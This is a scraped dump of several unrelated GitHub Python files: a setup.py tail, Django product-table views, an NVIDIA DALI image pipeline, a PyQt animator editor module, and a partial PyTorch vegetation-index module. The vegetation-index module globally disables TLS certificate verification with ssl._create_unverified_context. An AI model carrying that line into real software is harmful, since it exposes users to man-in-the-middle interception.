install_requires=requirements,\n license=\"MIT license\",\n long_description=readme,\n long_description_content_type=\"text/markdown\",\n include_package_data=True,\n keywords=\"healthchecks_context_manager\",\n name=\"healthchecks_wrapper\",\n packages=find_packages(include=[\"healthchecks_wrapper\", \"healthchecks_wrapper.*\"]),\n test_suite=\"tests\",\n tests_require=test_requirements,\n url=\"https://github.com/samarpan-rai/healthchecks_wrapper\",\n version=\"0.1.6\",\n 
zip_safe=False,\n)\n","repo_name":"samarpan-rai/healthchecks_wrapper","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"94"} +{"seq_id":"70908111031","text":"from django.http import HttpResponse\nfrom django.shortcuts import render, redirect\nfrom apps.tables.forms import ProductForm\nfrom apps.common.models import Product\nfrom django.core.paginator import Paginator\nfrom django.contrib.auth.decorators import login_required\nfrom apps.tables.utils import product_filter\n\n# Create your views here.\n\ndef datatables(request):\n filters = product_filter(request)\n product_list = Product.objects.filter(**filters)\n form = ProductForm()\n\n page = request.GET.get('page', 1)\n paginator = Paginator(product_list, 5)\n products = paginator.page(page)\n\n if request.method == 'POST':\n form = ProductForm(request.POST)\n if form.is_valid():\n return post_request_handling(request, form)\n\n context = {\n 'segment' : 'datatables',\n 'parent' : 'apps',\n 'form' : form,\n 'products' : products\n }\n \n return render(request, 'apps/datatables.html', context)\n\n\n\n@login_required(login_url='/users/signin/')\ndef post_request_handling(request, form):\n form.save()\n return redirect(request.META.get('HTTP_REFERER'))\n\n@login_required(login_url='/users/signin/')\ndef delete_product(request, id):\n product = Product.objects.get(id=id)\n product.delete()\n return redirect(request.META.get('HTTP_REFERER'))\n\n\n@login_required(login_url='/users/signin/')\ndef update_product(request, id):\n product = Product.objects.get(id=id)\n if request.method == 'POST':\n product.name = request.POST.get('name')\n product.price = int(request.POST.get('price'))\n product.info = request.POST.get('info')\n product.save()\n return redirect(request.META.get('HTTP_REFERER'))","repo_name":"app-generator/rocket-django","sub_path":"apps/tables/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1655,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"94"} +{"seq_id":"72338515508","text":"from nvidia.dali.plugin.pytorch import DALIClassificationIterator\nfrom nvidia.dali.pipeline import Pipeline\nimport nvidia.dali.ops as ops\nimport nvidia.dali.types as types\n\n\nclass HybridTrainPipe(Pipeline):\n def __init__(self, data_dir, batch_size, num_threads=4):\n super().__init__(batch_size, num_threads, device_id=0)\n self.input = ops.FileReader(\n file_root='.', file_list='train_list', random_shuffle=True)\n self.shape = 512\n self.pre_transforms = [\n ops.nvJPEGDecoder(\n device='mixed',\n device_memory_padding=211025920,\n host_memory_padding=140544512),\n ops.Resize(\n device='gpu',\n resize_x=self.shape,\n resize_y=self.shape,\n interp_type=types.INTERP_TRIANGULAR),\n ]\n self.post_transforms = [\n ops.NormalizePermute(\n device='gpu',\n height=self.shape,\n width=self.shape,\n #mean=[105.0, 72.7, 51.8],\n #std=[255 * 6.90, 255 * 4.76, 255 * 3.38]),\n mean=[0., 0., 0.],\n std=[255., 255., 255.]),\n ]\n self.coin = ops.CoinFlip()\n self.fh_op = ops.Flip(device='gpu', horizontal=1, vertical=0)\n self.fv_op = ops.Flip(device='gpu', horizontal=0, vertical=1)\n #self.twist = ops.ColorTwist(device='gpu')\n #self.rng1 = ops.Uniform(range=(-0.1, 0.1))\n #self.rng2 = ops.Uniform(range=(0.75, 1.5))\n #self.rng3 = ops.Uniform(range=(-0.15, 0.15))\n\n def define_graph(self):\n images, labels = self.input(name='Reader')\n for transform in 
self.pre_transforms:\n images = transform(images)\n if self.coin():\n images = self.fh_op(images)\n if self.coin():\n images = self.fv_op(images)\n #images = self.twist(\n # images,\n # saturation=self.rng2(),\n # contrast=self.rng2(),\n # brightness=self.rng1(),\n # hue=self.rng3())\n for transform in self.post_transforms:\n images = transform(images)\n return images, labels\n\n\nclass HybridTestPipe(Pipeline):\n def __init__(self, data_dir, batch_size, num_threads=4):\n super().__init__(batch_size, num_threads, device_id=0)\n self.input = ops.FileReader(\n file_root='.', file_list='test_list', random_shuffle=True)\n self.shape = 512\n self.transforms = [\n ops.nvJPEGDecoder(device='mixed'),\n ops.Resize(\n device='gpu',\n resize_x=self.shape,\n resize_y=self.shape,\n interp_type=types.INTERP_TRIANGULAR),\n ops.NormalizePermute(\n device='gpu',\n height=self.shape,\n width=self.shape,\n #mean=[105.0, 72.7, 51.8],\n #std=[255 * 6.90, 255 * 4.76, 255 * 3.38]),\n mean=[0., 0., 0.],\n std=[255., 255., 255.]),\n ]\n\n def define_graph(self):\n images, labels = self.input(name='Reader')\n for transform in self.transforms:\n images = transform(images)\n return images, labels\n\n\ndef get_dataloaders(batch_size, _):\n def get_loader(Pipe):\n pipe = Pipe('data', batch_size, 1)\n pipe.build()\n return DALIClassificationIterator(pipe, size=pipe.epoch_size('Reader'))\n\n return get_loader(HybridTrainPipe), get_loader(HybridTestPipe)\n","repo_name":"chengscott/dlp2019","sub_path":"lab3/daliloader.py","file_name":"daliloader.py","file_ext":"py","file_size_in_byte":3202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"17366169137","text":"import random\nimport time\n\n##----------------------------------------------------------------##\nfrom gii.core import app, signals\nfrom gii.qt import QtEditorModule\n\nfrom gii.qt.IconCache import getIcon\nfrom gii.qt.controls.GenericTreeWidget import GenericTreeWidget\nfrom gii.qt.dialogs import alertMessage\nfrom gii.moai.MOAIRuntime import MOAILuaDelegate\nfrom gii.SceneEditor import SceneEditorModule, getSceneSelectionManager\nfrom gii.qt.helpers import addWidgetWithLayout, QColorF, unpackQColor\n\n##----------------------------------------------------------------##\nfrom PyQt4 import QtCore, QtGui, uic\nfrom PyQt4.QtCore import Qt\n\n##----------------------------------------------------------------##\nfrom mock import _MOCK, isMockInstance\n##----------------------------------------------------------------##\nfrom AnimatorWidget import AnimatorWidget\n##----------------------------------------------------------------##\n\ndef _getModulePath( path ):\n\timport os.path\n\treturn os.path.dirname( __file__ ) + '/' + path\n\ndef _fixDuplicatedName( names, name, id = None ):\n\tif id:\n\t\ttestName = name + '_%d' % id\n\telse:\n\t\tid = 0\n\t\ttestName = name\n\t#find duplicated name\n\tif testName in names:\n\t\treturn _fixDuplicatedName( names, name, id + 1)\n\telse:\n\t\treturn testName\n\n##----------------------------------------------------------------##\nPREVIEW_SPEED_OPTIONS = [\n\t\t( '1/10', 0.1 ),\n\t\t( '1/5', 0.2 ),\n\t\t( '1/3', 0.33 ),\n\t\t( '1/2', 0.5 ),\n\t\t( '1x', 1.0 ),\n\t\t( '1.5x', 1.5 ),\n\t\t( '2x', 2.0 ),\n\t\t( '4x', 4.0 ),\n\t\t( '10x', 10.0 ),\n]\n\n##----------------------------------------------------------------##\nclass AnimatorView( SceneEditorModule ):\n\tname = 'animator'\n\tdependency = [ 'scene_editor', 'mock' ]\n\n\tdef onLoad( self 
):\n\t\t#UI\n\t\tself.windowTitle = 'Animator'\n\t\tself.window = self.requestDockWindow( 'AnimatorView',\n\t\t\ttitle = 'Animator',\n\t\t\tsize = (120,120),\n\t\t\tminSize = (120,120),\n\t\t\tdock = 'bottom'\n\t\t\t)\n\t\t\n\t\tself.widget = AnimatorWidget()\n\t\tself.window.addWidget( self.widget )\n\t\tself.toolbarTarget = self.addToolBar( 'animator_target', self.widget.toolbarTarget )\n\t\tself.toolbarClips = self.addToolBar( 'animator_clips', self.widget.toolbarClips )\n\t\tself.toolbarPlay = self.addToolBar( 'animator_play', self.widget.toolbarPlay )\n\t\tself.toolbarTrack = self.addToolBar( 'animator_track', self.widget.toolbarTrack )\n\t\t# self.toolbarEdit = self.addToolBar( 'animator_play', self.widget.toolbarEdit )\n\n\t\tsignals.connect( 'scene.close', self.onSceneClose )\n\t\tsignals.connect( 'scene.save', self.preSceneSave )\n\t\tsignals.connect( 'scene.saved', self.postSceneSave )\n\n\t\t# addWidgetWithLaytut( toolbar,\n\t\t# \tself.widget.containerEditTool )\n\t\tself.addTool( 'animator_target/change_context', label = 'Change Context', icon = 'in' )\n\t\tself.addTool( 'animator_target/save_data', label = 'Save Data', icon = 'save' )\n\n\t\tself.addTool( 'animator_clips/add_clip_group', label = 'add group', icon = 'add_folder' )\n\t\tself.addTool( 'animator_clips/add_clip', label = 'add', icon = 'add' )\n\t\tself.addTool( 'animator_clips/remove_clip', label = 'remove', icon = 'remove' )\n\t\tself.addTool( 'animator_clips/clone_clip', label = 'clone', icon = 'clone' )\n\n\n\t\tself.addTool( 'animator_play/goto_start', label = 'to start', icon = 'rewind' )\n\t\t# self.addTool( 'animator_play/prev_key', label = 'prev key', icon = 'previous' )\n\t\tself.addTool( 'animator_play/stop', label = 'stop', icon = 'stop' )\n\t\tself.addTool( 'animator_play/play', label = 'play', icon = 'play', type = 'check' )\n\t\t# self.addTool( 'animator_play/next_key', label = 'next key', icon = 'next' )\n\t\tself.addTool( 'animator_play/goto_end', label = 'to end', icon = 'fast_forward' )\n\t\tself.addTool( 'animator_play/toggle_repeat', label = 'toggle repeat', icon = 'repeat', type = 'check' )\n\t\tself.comboPreviewSpeed = QtGui.QComboBox()\n\t\tself.comboPreviewSpeed.addItems([ e[0] for e in PREVIEW_SPEED_OPTIONS ] )\t\t\t\n\t\tself.comboPreviewSpeed.setCurrentIndex( 4 ) #1x\n\t\tself.comboPreviewSpeed.currentIndexChanged.connect( self.onPreviewSpeedChange )\n\t\tself.addTool( 'animator_play/preview_speed', widget = self.comboPreviewSpeed )\n\t\t\n\t\t#SIGNALS\n\t\tself.addTool( 'animator_track/locate_target', label = 'locate', icon = 'find' )\n\t\tself.addTool( 'animator_track/----' )\n\t\tself.addTool( 'animator_track/add_track_group', label = 'add group', icon = 'add_folder' )\n\t\tself.addTool( 'animator_track/add_track', label = 'add', icon = 'add' )\n\t\tself.addTool( 'animator_track/remove_track', label = 'remove', icon = 'remove' )\n\n\t\t#\n\t\tsignals.connect( 'selection.changed', self.onSceneSelectionChanged )\n\n\t\tself.delegate = MOAILuaDelegate( self )\n\t\tself.delegate.load( _getModulePath( 'AnimatorView.lua' ) )\n\n\t\tself.widget.setOwner( self )\n\n\t\t#playback\n\t\tself.previewing = False\n\t\tself.setEditing( False )\n\n\t\tself.targetAnimator = None\n\t\tself.targetClip = None\n\t\tself.targetAnimatorData = None\n\t\tself.currentTrack = None\n\n\t\tself.previewing = False\n\t\tself.previewLoop = False\n\t\tself.previewTime = 0.0\n\t\tself.previewStep = 1.0/60.0\n\n\t\tself.previewTimer = QtCore.QTimer( self.widget )\n\t\tself.previewTimer.setInterval( 1000.0/65 
)\n\t\tself.previewTimer.stop()\n\n\t\tself.previewTimer.timeout.connect( self.onPreviewTimer )\n\n\tdef onStart( self ):\n\t\tpass\n\n\tdef setEditing( self, editing ):\n\t\tself.widget.timeline.setEnabled( editing )\n\t\tself.widget.treeTracks.setEnabled( editing )\n\t\tself.findTool( 'animator_play' ).setEnabled( editing )\n\t\tself.findTool( 'animator_track' ).setEnabled( editing )\n\t\tself.findTool( 'animator_clips/add_clip_group').setEnabled( editing )\n\t\tself.findTool( 'animator_clips/add_clip' ).setEnabled( editing )\n\t\tself.findTool( 'animator_clips/remove_clip' ).setEnabled( editing )\n\t\tself.findTool( 'animator_clips/clone_clip' ).setEnabled( editing )\n\n\tdef setTargetAnimator( self, target ):\n\t\tself.saveAnimatorData()\n\t\tif target == self.targetAnimator: return\n\t\tif self.previewing:\n\t\t\tself.stopPreview()\n\t\tself.targetAnimator = target\n\t\tself.targetClip = None\n\t\tself.delegate.callMethod( 'view', 'setTargetAnimator', target )\n\t\tself.targetAnimatorData = self.delegate.callMethod( 'view', 'getTargetAnimatorData' )\n\t\tself.widget.rebuild()\n\t\tif self.targetAnimator:\n\t\t\tself.setEditing( True )\n\t\t\tsignals.emit( 'animator.start' )\n\t\telse:\n\t\t\tself.setEditing( False )\n\t\t\tsignals.emit( 'animator.stop' )\n\t\t\t\n\t\tpath = self.delegate.callMethod( 'view', 'getTargetAnimatorDataPath' )\n\t\tif path:\n\t\t\tself.window.setWindowTitle( 'Animator - %s' % path )\n\t\telse:\n\t\t\tself.window.setWindowTitle( 'Animator' )\n\t\tclip = self.delegate.callMethod( 'view', 'getPreviousTargeClip', target )\n\t\tself.enableTool( 'animator_play' , False )\n\t\tself.enableTool( 'animator_track', False )\n\t\tif clip:\n\t\t\tself.widget.treeClips.selectNode( clip )\n\t\telse:\n\t\t\tself.widget.treeClips.selectFirstItem()\n\t\tself.applyTime( 0, True )\n\n\tdef setTargetClip( self, clip ):\n\t\twasPreviewing = self.previewing\n\t\tif self.previewing:\n\t\t\tself.stopPreview()\n\n\t\tself.targetClip = clip\n\t\tself.delegate.callMethod( 'view', 'setTargetClip', clip )\n\t\tself.widget.rebuildTimeline()\n\t\tself.enableTool( 'animator_play' , bool( clip ) )\n\t\tself.enableTool( 'animator_track', bool( clip ) )\n\t\tself.applyTime( 0, True )\n\t\tif wasPreviewing:\n\t\t\tself.startPreview()\n\n\tdef setCurrentTrack( self, track ):\n\t\tself.currentTrack = track\n\t\tself.delegate.callMethod( 'view', 'setCurrentTrack', track )\n\n\tdef getTargetClipLength( self ):\n\t\treturn self.delegate.callMethod( 'view', 'getTargetClipLength' )\n\n\tdef getClipList( self ):\n\t\tif self.targetAnimatorData:\n\t\t\tclipList = self.targetAnimatorData.clips\n\t\t\treturn [ clip for clip in clipList.values() ]\n\t\telse:\n\t\t\treturn []\n\n\tdef getRootClipGroup( self ):\n\t\tif self.targetAnimatorData:\n\t\t\treturn self.targetAnimatorData.getRootGroup( self.targetAnimatorData )\n\n\tdef getTrackList( self ):\n\t\tif self.targetClip:\n\t\t\ttrackList = self.targetClip.getTrackList( self.targetClip )\n\t\t\treturn [ track for track in trackList.values() ]\n\t\telse:\n\t\t\treturn []\n\n\tdef getMarkerList( self ):\n\t\tif self.targetClip:\n\t\t\tmarkerList = self.targetClip.getMarkerList( self.targetClip )\n\t\t\treturn [ track for track in markerList.values() ]\n\t\telse:\n\t\t\treturn []\n\n\tdef getClipRoot( self ):\n\t\tif self.targetClip:\n\t\t\treturn self.targetClip.getRoot( self.targetClip )\n\t\telse:\n\t\t\treturn None\n\n\tdef addClip( self ):\n\t\tif not self.targetAnimatorData: return\n\t\ttargetGroup = self.widget.getCurrentClipGroup()\n\t\tcmd = 
self.doCommand( 'scene_editor/animator_add_clip',\n\t\t\tanimator_data = self.targetAnimatorData,\n\t\t\tparent_group = targetGroup\n\t\t )\n\t\tclip = cmd.getResult()\n\t\tif clip:\n\t\t\tself.widget.addClip( clip, True )\n\t\treturn clip\n\n\tdef addClipGroup( self ):\n\t\tif not self.targetAnimatorData: return\n\t\ttargetGroup = self.widget.getCurrentClipGroup()\n\t\tcmd = self.doCommand( 'scene_editor/animator_add_clip_group',\n\t\t\tanimator_data = self.targetAnimatorData,\n\t\t\tparent_group = targetGroup\n\t\t )\n\t\tgroup = cmd.getResult()\n\t\tif group:\n\t\t\tself.widget.addClip( group, True )\n\t\treturn group\n\n\tdef removeClipNode( self ):\n\t\tfor clip in self.widget.treeClips.getSelection():\n\t\t\tif self.doCommand( 'scene_editor/animator_remove_clip_node',\n\t\t\t\tanimator_data = self.targetAnimatorData,\n\t\t\t\ttarget_node = clip\n\t\t\t):\n\t\t\t\tself.widget.removeClip( clip )\n\n\tdef cloneClipNode( self ):\n\t\tif not self.targetClip: return\n\t\tresult = []\n\t\tfor clip in self.widget.treeClips.getSelection():\n\t\t\tcmd = self.doCommand( 'scene_editor/animator_clone_clip_node',\n\t\t\t\tanimator_data = self.targetAnimatorData,\n\t\t\t\ttarget_node = clip\n\t\t\t)\n\t\t\tif cmd:\n\t\t\t\tcloned = cmd.getResult()\n\t\t\t\tself.widget.addClip( cloned )\n\t\t\t\tresult.append( cloned )\n\t\treturn result\n\n\tdef onObjectEdited( self, obj ):\n\t\tif self.targetClip:\n\t\t\tself.delegate.callMethod( 'view', 'clearPreviewState' )\n\t\t\tself.delegate.callMethod( 'view', 'markClipDirty' )\n\n\tdef onSceneSelectionChanged( self, selection, key ):\n\t\tif key != 'scene': return\n\t\t#find animator component\n\t\t# self.findTargetAnimator()\n\n\tdef findTargetAnimator( self ):\n\t\ttarget = self.delegate.callMethod( 'view', 'findTargetAnimator' )\n\t\tself.setTargetAnimator( target )\n\t\treturn target\n\n\tdef checkTargetAnimator( self ):\n\t\tif not self.targetAnimator:\n\t\t\talertMessage( 'No Animator', 'No Animator Selected', 'question' )\n\t\t\treturn False\n\t\treturn True\n\n\tdef addMarker( self ):\n\t\tif not self.targetClip: return\n\t\tcmd = self.doCommand( 'scene_editor/animator_add_marker' ,\n\t\t\t\ttarget_clip = self.targetClip,\n\t\t\t\ttarget_pos = self.widget.getCursorPos()\n\t\t\t)\n\t\tif cmd:\n\t\t\tmarker = cmd.getResult()\n\t\t\tself.widget.addMarker( marker )\n\n\tdef addKeyForField( self, target, fieldId ):\n\t\tif not self.checkTargetAnimator(): return \n\n\t\tif not self.targetClip:\n\t\t\tself.addClip()\n\t\t\t# alertMessage( 'No Clip', 'You need to select a Clip first', 'question' )\n\t\t\t# return False\n\t\tkeys = self.delegate.callMethod( 'view', 'addKeyForField', target, fieldId )\n\t\tif keys:\n\t\t\tfor key in keys.values():\n\t\t\t\tself.widget.addKey( key, True )\n\n\tdef addKeyForEvent( self, target, eventId ):\n\t\tpass\n\n\tdef addCustomAnimatorTrack( self, target, trackClasId ):\n\t\tif not self.checkTargetAnimator(): return\n\t\t\t\n\t\ttrack = self.delegate.callMethod( 'view', 'addCustomAnimatorTrack', target, trackClasId )\n\t\tif track:\n\t\t\tself.widget.addTrack( track )\n\n\tdef addKeyForSelectedTracks( self ):\n\t\t#TODO: command\n\t\tselectedTracks = self.widget.getTrackSelection()\n\t\tfor track in selectedTracks:\n\t\t\tkeys = self.delegate.callMethod( 'view', 'addKeyForSelectedTrack', track )\n\t\t\tif keys:\n\t\t\t\tfor key in keys.values():\n\t\t\t\t\tself.widget.addKey( key, True )\n\n\tdef removeSelectedKeys( self ):\n\t\t#TODO: command\n\t\tselectedKeys = self.widget.getKeySelection()\n\t\tfor key in 
selectedKeys:\n\t\t\tself.widget.removeKey( key )\n\n\tdef cloneSelectedKeys( self ):\n\t\t#TODO: command\n\t\tselectedKeys = self.widget.getKeySelection()\n\t\tcloned = []\n\t\tfor key in selectedKeys:\n\t\t\tclonedKey = self.delegate.callMethod( 'view', 'cloneKey', key )\n\t\t\tif clonedKey:\n\t\t\t\tcloned.append( clonedKey )\n\n\t\tfor clonedKey in cloned:\n\t\t\tself.widget.addKey( clonedKey, False )\n\n\tdef onKeyRemoving( self, key ):\n\t\tif self.delegate.callMethod( 'view', 'removeKey', key ) != False:\n\t\t\treturn True\n\n\tdef onMarkerRemoving( self, marker ):\n\t\tif self.delegate.callMethod( 'view', 'removeMarker', marker ) != False:\n\t\t\treturn True\n\n\tdef onClipLengthChanging( self, t1 ):\n\t\tif self.delegate.callMethod( 'view', 'setTargetClipLength', t1 ) != False:\n\t\t\treturn True\n\n\tdef onTimelineKeyChanged( self, key, pos, length ):\n\t\tself.delegate.callMethod( 'view', 'updateTimelineKey', key, pos, length )\n\n\tdef onTimelineKeyCurveValueChanged( self, key, value ):\n\t\tself.delegate.callMethod( 'view', 'updateTimelineKeyCurveValue', key, value )\n\n\tdef onTimelineKeyTweenModeChanged( self, key, mode ):\n\t\tself.delegate.callMethod( 'view', 'updateTimelineKeyTweenMode', key, mode )\n\n\tdef onTimelineKeyBezierPointChanged( self, key, bpx0, bpy0, bpx1, bpy1 ):\n\t\tself.delegate.callMethod( 'view', 'updateTimelineKeyBezierPoint', key, bpx0, bpy0, bpx1, bpy1 )\n\n\tdef onTimelineMarkerChanged( self, marker, pos ):\n\t\tself.delegate.callMethod( 'view', 'updateTimelineMarker', marker, pos )\n\n\tdef toggleTrackActive( self, track ):\n\t\t#TODO: command\n\t\t# self.module.doCommand( 'scene_editor/toggle_entity_visibility', target = node )\n\t\tself.delegate.callMethod( 'view', 'toggleTrackActive', track )\n\n\n\tdef renameTrack( self, track, name ):\n\t\tself.delegate.callMethod( 'view', 'renameTrack', track, name )\n\n\tdef renameClip( self, clip, name ):\n\t\tself.delegate.callMethod( 'view', 'renameClip', clip, name )\n\n\tdef onTool( self, tool ):\n\t\tname = tool.name\n\t\tif name == 'change_context':\n\t\t\ttarget0 = self.targetAnimator\n\t\t\ttarget1 = self.findTargetAnimator()\n\t\t\tif ( not target0 ) and ( not target1 ):\n\t\t\t\talertMessage( 'No Animator', 'No Animator found in selected entity scope', 'question' )\n\t\t\t\t\n\t\telif name == 'save_data':\n\t\t\tself.saveAnimatorData()\n\n\t\telif name == 'add_clip':\n\t\t\tif self.checkTargetAnimator():\n\t\t\t\tself.addClip()\n\n\t\telif name == 'add_clip_group':\n\t\t\tif self.checkTargetAnimator():\n\t\t\t\tself.addClipGroup()\n\n\t\telif name == 'remove_clip':\n\t\t\tif self.checkTargetAnimator():\n\t\t\t\tself.removeClipNode()\t\t\t\n\n\t\telif name == 'clone_clip':\n\t\t\tif self.checkTargetAnimator():\n\t\t\t\tself.cloneClipNode()\t\t\t\n\n\t\telif name == 'add_track_group':\n\t\t\tgroup = self.delegate.callMethod( 'view', 'addTrackGroup' )\n\t\t\tif group:\n\t\t\t\tself.widget.addTrack( group, True )\n\n\t\telif name == 'remove_track':\n\t\t\tfor track in self.widget.treeTracks.getSelection():\n\t\t\t\tself.delegate.callMethod( 'view', 'removeTrack', track )\n\t\t\t\tself.widget.removeTrack( track )\n\t\telif name == 'locate_target':\n\t\t\tfor track in self.widget.treeTracks.getSelection():\n\t\t\t\tsceneGraphEditor = self.getModule( 'scenegraph_editor')\n\t\t\t\tif sceneGraphEditor:\n\t\t\t\t\ttargetEntity = self.delegate.callMethod( 'view', 'findTrackEntity', track )\n\t\t\t\t\tif targetEntity:\n\t\t\t\t\t\tsceneGraphEditor.selectEntity( targetEntity, focus_tree = True 
)\n\t\t\t\t#pass\n\t\t\t\treturn\n\n\t\t#preview\n\t\telif name == 'goto_start':\n\t\t\tself.gotoStart()\n\t\telif name == 'goto_end':\n\t\t\tself.gotoEnd()\n\t\telif name == 'play':\n\t\t\tif tool.getValue():\n\t\t\t\tself.startPreview()\n\t\t\telse:\n\t\t\t\tself.stopPreview( False )\n\t\telif name == 'stop':\n\t\t\tself.stopPreview( True )\n\t\telif name == 'toggle_repeat':\n\t\t\tself.delegate.callMethod( 'view', 'togglePreviewRepeat', tool.getValue() )\n\t\t\t\n\n\tdef getActiveSceneView( self ):\n\t\treturn self.getModule( 'scene_view' )\n\n\t#preview\n\tdef startPreview( self ):\n\t\tself.saveAnimatorData()\n\t\tif self.delegate.callMethod( 'view', 'startPreview', self.previewTime ):\n\t\t\tself.widget.setCursorMovable( False )\n\t\t\tself.previewing = True\n\t\t\tself.findTool( 'animator_play/play' ).setValue( True )\n\t\t\tself.previewTimer.start()\n\t\t\tself.getApp().setMinimalMainLoopBudget()\n\t\t\t\n\tdef stopPreview( self, rewind = False ):\t\t\n\t\tif self.previewing:\n\t\t\tself.delegate.callMethod( 'view', 'stopPreview' )\n\t\t\tself.getApp().resetMainLoopBudget()\n\t\t\tself.widget.setCursorMovable( True )\n\t\t\tself.previewing = False\n\t\t\tself.findTool( 'animator_play/play' ).setValue( False )\n\t\t\tself.previewTimer.stop()\n\t\t\tsignals.emit( 'entity.modified', None , '' )\n\t\tif rewind:\n\t\t\tself.gotoStart()\n\n\tdef onPreviewTimer( self ):\n\t\tplaying, currentTime = self.delegate.callMethod( 'view', 'doPreviewStep' )\n\t\tself.previewTime = currentTime\n\t\tself.getActiveSceneView().forceUpdate()\n\t\tself.widget.setCursorPos( self.previewTime )\n\t\tif not playing:\n\t\t\tself.stopPreview()\n\t\t# signals.emit( 'entity.modified', None , '' )\n\n\tdef gotoStart( self ):\n\t\tif self.previewing:\n\t\t\tself.delegate.callMethod( 'view', 'applyTime', 0 )\n\t\telse:\n\t\t\tself.widget.setCursorPos( 0, True )\n\n\tdef gotoEnd( self ):\n\t\tif self.previewing:\n\t\t\tself.delegate.callMethod( 'view', 'applyTime', 10 )\n\t\telse:\n\t\t\tself.widget.setCursorPos( 10, True )\n\n\tdef applyTime( self, t, syncCursor = False ):\n\t\tself.previewTime = self.delegate.callMethod( 'view', 'applyTime', t )\n\t\tself.getActiveSceneView().forceUpdate()\n\t\tsignals.emit( 'entity.modified', None , '' )\n\t\tif syncCursor:\n\t\t\tself.widget.setCursorPos( t )\n\n\tdef saveAnimatorData( self ):\n\t\tif not self.targetAnimator:\n\t\t\treturn\n\t\tself.delegate.callMethod( 'view', 'saveData' )\n\n\tdef preSceneSave( self ):\n\t\tif self.targetAnimator:\n\t\t\tself.delegate.callMethod( 'view', 'restoreEntityState' )\n\n\tdef postSceneSave( self ):\n\t\tif self.targetAnimator:\n\t\t\tself.applyTime( self.previewTime )\n\n\tdef onSceneClose( self, scene ):\n\t\tself.setTargetAnimator( None )\n\n\tdef onPreviewSpeedChange( self, index ):\n\t\tlabel, throttle = PREVIEW_SPEED_OPTIONS[ index ]\n\t\tself.delegate.callMethod( 'view', 'setPreviewThrottle', throttle )\n\n\tdef refreshTimeline( self ):\n\t\tself.widget.rebuildTimeline()\n\n\tdef refreshClipList( self ):\n\t\tself.widget.rebuildClipList()\n\n\tdef refreshAll( self ):\n\t\tself.widget.rebuild()\n","repo_name":"tommo/gii","sub_path":"packages/Mock/Animator/AnimatorView.py","file_name":"AnimatorView.py","file_ext":"py","file_size_in_byte":17792,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"94"} +{"seq_id":"3609587021","text":"import os\nimport torch.nn.functional as F\nfrom collections import OrderedDict\nfrom pretrainedmodels import se_resnext50_32x4d, se_resnext101_32x4d\nfrom 
lib.net.scg_gcn import *\n\nfrom enum import Enum\nimport ssl\nssl._create_default_https_context = ssl._create_unverified_context\n\nfrom torchvision.utils import save_image\n\n# assuming (N, R, G, B) order #TODO make sure RGB/BGR?\nNIR = 0\nRED = 1\nGREEN = 2\nBLUE = 3\n\nchannel_params= dict(\n NDVI = dict(alphas = torch.tensor([1, -1, 0, 0, 0, 1, 1, 0, 0, 0], dtype=torch.double), min=-1, max=1, min_clip=-1, max_clip=1),\n gNDVI = dict(alphas = torch.tensor([1, 0, -1, 0, 0, 1, 0, 1, 0, 0], dtype=torch.double), min=-1, max=1, min_clip=-1, max_clip=1),\n SAVI = dict(alphas = torch.tensor([1, -1, 0, 0, 0, 1.5, 1.5, 0, 0, 0.75], dtype=torch.double), min=-10000, max=10000, min_clip=-10000, max_clip=10000), # L = 0.5\n RVI = dict(alphas = torch.tensor([0, 1, 0, 0, 0, 1, 0, 0, 0, 0], dtype=torch.double), min=-10000, max=10000, min_clip=-10000, max_clip=10000),\n DVI = dict(alphas = torch.tensor([1, -1, 0, 0, 0, 0, 0, 0, 0, 0], dtype=torch.double), min=-1, max=1, min_clip=-1, max_clip=1),\n VDVI = dict(alphas = torch.tensor([0, -1, 2, -1, 0, 0, 1, 2, 1, 0], dtype=torch.double), min=-1, max=1, min_clip=-1, max_clip=1),\n GCC = dict(alphas = torch.tensor([0, 0, 0, 1, 0, 0, 1, 1, 1, 0], dtype=torch.double), min=0, max=1, min_clip=0, max_clip=1),\n EVI = dict(alphas = 2.5*torch.tensor([1, -1, 0, 0, 0, 1, 6, 0, -7.5, 1], dtype=torch.double), min=-10000, max=10000, min_clip=-10000, max_clip=10000),\n VARI = dict(alphas = torch.tensor([0, -1, 1, 0, 0, 0, 1, 1, -1, 0], dtype=torch.double), min=-10000, max=10000, min_clip=-10000, max_clip=10000),\n)\n\n\n\nclass AppendGenericAgriculturalIndices(nn.Module):\n \"\"\"GAI = (a0N + a1R + a2G + a3B + a4)/(a5N + a6R + a7G + a8B + a9)\"\"\"\n def __init__(self, alphas = None, epsilon=1e-7, learn=False, std=1.0, min=None, max=None, min_clip=None, max_clip=None)->None:\n super().__init__()\n # self.bn = nn.BatchNorm2d(1)\n if alphas == None:\n alphas = torch.normal(mean=0.0, std=std, size=(10, ))\n\n if learn:\n self.alphas = nn.Parameter(alphas)\n else:\n self.alphas = alphas\n \n\n self.epsilon = epsilon\n self.dim = -3\n self.min = min\n self.max = max\n self.min_clip = min_clip\n self.max_clip = max_clip\n \n def _min_max_normalize(self, x):\n return (x - self.min)/(self.max - self.min)\n \n def forward(self, x):\n if self.min_clip or self.max_clip:\n x = torch.clip(x, min=self.min_clip, max=self.max_clip)\n\n red_band, green_band, blue_band, nir_band = x[:, RED, :, :], x[:, GREEN, :, :], x[:, BLUE, :, :], x[:, NIR, :, :]\n nomin = self.alphas[0]*nir_band + self.alphas[1]*red_band + self.alphas[2]*green_band + self.alphas[3]*blue_band + self.alphas[4]\n denom = self.alphas[5]*nir_band + self.alphas[6]*red_band + self.alphas[7]*green_band + self.alphas[8]*blue_band + self.alphas[9]\n # index = nomin/(denom + self.epsilon)\n index = nomin/(torch.clamp(denom, min=self.epsilon))\n\n if self.max and self.min:\n index = self._min_max_normalize(index)\n\n index = index.unsqueeze(self.dim)\n # index = self.bn(index) # batch norm after non-linearity\n y = torch.cat((x, index), dim=self.dim)\n return y\n\nclass IndexTransforms(nn.Module):\n def __init__(self, args) -> None:\n super().__init__()\n self.transforms = []\n\n if args.NDVI:\n self.transforms.append(AppendGenericAgriculturalIndices(**channel_params[\"NDVI\"]))\n if args.gNDVI:\n self.transforms.append(AppendGenericAgriculturalIndices(**channel_params[\"gNDVI\"]))\n if args.SAVI:\n 